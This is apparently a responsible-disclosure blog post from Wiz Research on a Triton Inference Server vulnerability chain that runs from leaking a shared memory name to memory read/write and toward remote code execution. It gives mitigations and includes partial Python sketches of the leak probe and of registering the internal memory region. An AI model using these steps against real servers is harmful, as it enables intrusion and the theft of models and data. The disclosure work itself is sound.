Breaking NVIDIA Triton: CVE-2025-23319 - A Vulnerability Chain Leading to AI Server Takeover

Wiz Research discovers a critical vulnerability chain allowing unauthenticated attackers to take over NVIDIA's Triton Inference Server.

The Wiz Research team has discovered a chain of critical vulnerabilities in NVIDIA's Triton Inference Server, a popular open-source platform for running AI models at scale. When chained together, these flaws can potentially allow a remote, unauthenticated attacker to gain complete control of the server, achieving remote code execution (RCE).

This attack path originates in the server's Python backend and starts with a minor information leak that cleverly escalates into a full system compromise. This poses a critical risk to organizations using Triton for AI/ML, as a successful attack could lead to the theft of valuable AI models, exposure of sensitive data, manipulation of the AI model's responses, and a foothold for attackers to move deeper into a network.

Wiz Research responsibly disclosed these findings to NVIDIA, and a patch has been released. We would like to thank the NVIDIA security team for their excellent collaboration and swift response. NVIDIA has assigned the following identifiers to this vulnerability chain: CVE-2025-23319, CVE-2025-23320, and CVE-2025-23334. We strongly recommend all Triton Inference Server users update to the latest version. This post provides a high-level overview of these new vulnerabilities and their potential impact. 

This research is the latest in a series of NVIDIA vulnerabilities we’ve disclosed, including two container escapes: CVE-2025-23266 and CVE-2024-0132.

Mitigations

  1. Update Immediately: The primary mitigation is to upgrade both the NVIDIA Triton Inference Server and the Python backend to version 25.07, as advised in the NVIDIA security bulletin.
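To confirm which version a server is running, Triton exposes a server metadata endpoint. The sketch below is illustrative only and assumes the default HTTP endpoint on localhost:8000; note that the reported core version string (e.g. 2.x.y) corresponds to a container release such as 25.07 via NVIDIA's release notes.

```python
# Illustrative sketch: query Triton's server metadata endpoint (GET /v2).
# The URL/port are assumptions (default HTTP port 8000); map the reported
# core version to a container release using NVIDIA's release notes.
import requests

meta = requests.get("http://localhost:8000/v2").json()
print(meta.get("name"), meta.get("version"))
```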

Wiz customers can use the Wiz platform to detect vulnerable instances in their cloud environment.

The Inner Workings of Triton

To understand the vulnerability, it helps to know a little about Triton's architecture. Triton is designed to be a universal inference server, capable of deploying models from any major AI framework (PyTorch, TensorFlow, etc.). It achieves this flexibility through a modular system of backends, where each backend is responsible for executing models from a specific framework. When an inference request for a specific model arrives, Triton automatically routes the request to the necessary backend for execution.
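To make this routing concrete, here is a minimal client-side sketch, assuming the tritonclient Python package; the model and tensor names are hypothetical. The client only names the model, and Triton consults that model's configuration to dispatch the request to the matching backend.

```python
# Hedged sketch: the client addresses a model by name; Triton performs the
# backend routing server-side. Model/tensor names are hypothetical.
import numpy as np
import tritonclient.http as httpclient

client = httpclient.InferenceServerClient(url="localhost:8000")

inp = httpclient.InferInput("INPUT0", [1, 4], "FP32")
inp.set_data_from_numpy(np.zeros((1, 4), dtype=np.float32))

# The same call works whether "my_python_model" runs on the Python backend
# or any other backend; the client never selects the backend itself.
result = client.infer(model_name="my_python_model", inputs=[inp])
print(result.as_numpy("OUTPUT0"))
```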

Our research focused on the Python backend, one of the most popular and versatile backends in the Triton ecosystem. It not only serves models written directly in Python but also acts as a dependency for several other backends, meaning that even models configured to run under a different backend may still use the Python backend internally during parts of the inference process. Given this widespread usage, we chose it as the focus of our security research.



Python backend internals

The Triton Python backend's core logic is implemented in C++ and is designed to handle inference requests for Python models. When a request arrives, this C++ component communicates with a separate "stub" process, which is responsible for loading and executing the model code. To facilitate communication between its own C++ logic and this stub process, the backend relies on a sophisticated Inter-Process Communication (IPC) mechanism for both inference and internal operations. This IPC is built on named shared memory (/dev/shm), creating a memory region accessible via a unique system path. This design allows for high-speed data exchange, but it also introduces a critical dependency: the names of these shared memory regions must remain private.
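As a rough illustration of why those names matter, the snippet below (plain Python, not Triton's actual C++ IPC code; the region name is hypothetical) shows that attaching to a named shared memory region under /dev/shm requires nothing more than knowing its name.

```python
# Minimal illustration, not Triton's implementation: a named POSIX shared
# memory region appears as a file under /dev/shm, and any process that learns
# its name (and can access /dev/shm) can attach to the same bytes.
from multiprocessing import shared_memory

# "Backend" side: create a region with a supposedly private name
# (hypothetical name; on Linux this backs /dev/shm/<name>).
region = shared_memory.SharedMemory(
    name="triton_python_backend_shm_region_example",
    create=True,
    size=1024,
)
region.buf[:5] = b"hello"

# "Other process" side: attaching requires nothing but the name.
peer = shared_memory.SharedMemory(name="triton_python_backend_shm_region_example")
print(bytes(peer.buf[:5]))  # b'hello'

peer.close()
region.close()
region.unlink()
```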

Vulnerabilities Overview

Step 1: Information Disclosure of the Backend's Shared Memory Name

During our audit of the Python backend, we discovered a flaw in its error handling mechanism. By sending a crafted, large remote request, an attacker can trigger an exception that results in a crucial information disclosure. The resulting error message, returned to the user, improperly includes the full, unique name of the backend's internal IPC shared memory region.

The returned error message appears as follows: {"error":"Failed to increase the shared memory pool size for key 'triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859'..."}

The disclosure of this name is the first critical step in the exploit chain, as it exposes an internal component that should remain private.
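The sketch below illustrates only the general shape of such a probe. The exact request that triggers the verbose error is deliberately omitted, and the model name, tensor shape, and payload are placeholders; the point is that the region name can be recovered from the error string with a simple pattern match.

```python
# Hedged sketch: the real trigger is not published. Everything below (model
# name, tensor shape, payload) is a placeholder illustrating how a leaked
# region name could be extracted from an error response.
import re
import requests

TRITON = "http://localhost:8000"
MODEL = "my_python_model"  # hypothetical model served by the Python backend

payload = {
    "inputs": [{
        "name": "INPUT0",
        "shape": [1, 50_000_000],  # deliberately oversized placeholder
        "datatype": "FP32",
        "data": [0.0],
    }]
}

resp = requests.post(f"{TRITON}/v2/models/{MODEL}/infer", json=payload)
match = re.search(r"triton_python_backend_shm_region_[0-9a-f\-]+", resp.text)
if match:
    print("Leaked internal IPC region name:", match.group(0))
```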

Step 2: Abusing the Shared Memory API for Arbitrary Read/Write

Triton offers a user-facing shared memory feature for performance. A client can use this feature to have Triton read input tensors from, and write output tensors to, a pre-existing shared memory region. This process avoids the costly transfer of large amounts of data over the network and is a documented, powerful tool for optimizing inference workloads.

/dev/shm/wiz-legit-shared-memory

Example of a user-created shared memory region's location
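For reference, the legitimate workflow looks roughly like this (a sketch assuming the tritonclient Python package; region names and sizes are illustrative): the client creates its own region under /dev/shm, registers it with the server, and then points request tensors at it instead of sending tensor bytes over the network.

```python
# Hedged sketch of the documented, legitimate shared memory workflow.
# Names and sizes are illustrative.
import tritonclient.http as httpclient
import tritonclient.utils.shared_memory as shm

client = httpclient.InferenceServerClient(url="localhost:8000")

# Create /dev/shm/wiz-legit-shared-memory and tell Triton about it.
handle = shm.create_shared_memory_region(
    "wiz-legit-shared-memory", "/wiz-legit-shared-memory", 4096
)
client.register_system_shared_memory(
    "wiz-legit-shared-memory", "/wiz-legit-shared-memory", 4096
)

# Subsequent inference requests can reference the region by name instead of
# carrying tensor data in the request body.
inp = httpclient.InferInput("INPUT0", [1, 1024], "FP32")
inp.set_shared_memory("wiz-legit-shared-memory", 4096)
```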

With the leaked name of the Python backend's internal IPC shared memory, an attacker can turn this public-facing API against itself. The vulnerability lies in the API's lack of validation; it does not check whether a provided shared memory key corresponds to a legitimate user-owned region or a private, internal one.

/dev/shm/triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859

Forcing Triton to use the Python backend's internal shared memory by providing it with the key triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859

An attacker can therefore call the registration endpoint with the leaked internal key. Once the server accepts it, they can craft subsequent inference requests that use this region for input or output. This provides the attacker with powerful read and write primitives into the Python backend's private memory, which also contains internal data and control structures related to its IPC mechanism, all performed through standard, legitimate API calls.
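Conceptually, the abuse reuses that same registration endpoint with the leaked internal key, as in the hedged sketch below; the chosen region name, byte size, and exact key format are assumptions.

```python
# Hedged sketch of the abuse described above: the system shared memory
# registration endpoint is handed the *leaked internal* key instead of a
# client-owned one. UUID, byte size, and key format are illustrative.
import requests

TRITON = "http://localhost:8000"
leaked_key = "triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859"

resp = requests.post(
    f"{TRITON}/v2/systemsharedmemory/evil-region/register",
    json={"key": leaked_key, "offset": 0, "byte_size": 1 << 20},
)
print(resp.status_code, resp.text)

# If accepted, later inference requests can name "evil-region" for inputs or
# outputs, turning ordinary API calls into reads and writes of the backend's
# own IPC memory.
```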

Step 3: Ways towards a Remote Code Execution

Since an attacker can now alter the Python backend's shared memory, they can cause unexpected behavior in the server. This capability can be leveraged to gain full control of the server. There are multiple exploitation avenues an attacker might use to achieve this:

  • One method involves corrupting existing data structures within the backend's shared memory region. In particular, an attacker can target structures that contain pointers (e.g., MemoryShm, SendMessageBase), enabling out-of-bounds memory access beyond the backend's shared memory.

  • Crafting malicious IPC messages and manipulating the IPC message queue to process them opens a new attack surface for exploitation, ranging from native memory corruption to logical exploits.

For now, we will not be publishing further technical details regarding the exploitation of this vulnerability.

Impact

The chain could allow a remote, unauthenticated attacker to take over an NVIDIA Triton Inference Server. This can lead to several critical outcomes, including:

  • Model Theft: Stealing proprietary and expensive AI models.

  • Data Breach: Intercepting sensitive data being processed by the models, such as user information or financial data.

  • Response Manipulation: Manipulating the AI model's output to produce incorrect, biased, or malicious responses.

  • Pivoting: Using the compromised server as a beachhead to attack other systems within the organization's network.

Conclusion

This research demonstrates how a series of seemingly minor flaws can be chained together to create a significant exploit. A verbose error message in one component and a misusable feature in the main server were all it took to create a path to potential system compromise. As companies deploy AI and ML more widely, securing the underlying infrastructure is paramount. This discovery highlights the importance of defense-in-depth, where security is considered at every layer of an application.

Responsible Disclosure Timeline

  • May 15, 2025: Wiz Research reported the vulnerability chain to NVIDIA.

  • May 16, 2025: NVIDIA acknowledged the report.

  • August 4, 2025: NVIDIA published the security bulletin, patches, and assigned CVEs: CVE-2025-23319, CVE-2025-23320, and CVE-2025-23334.

  • August 4, 2025: Wiz Research publishes this blog post.

Stay in touch!

Hi there! We are Ronen Shustin (@ronenshh), Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Hillai Ben-Sasson (@hillai), Andres Riancho (@andresriancho) and Yuval Avrahami (@yuvalavra) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors and service providers. We would love to hear from you! Feel free to contact us on X (Twitter) or via email: research@wiz.io. 
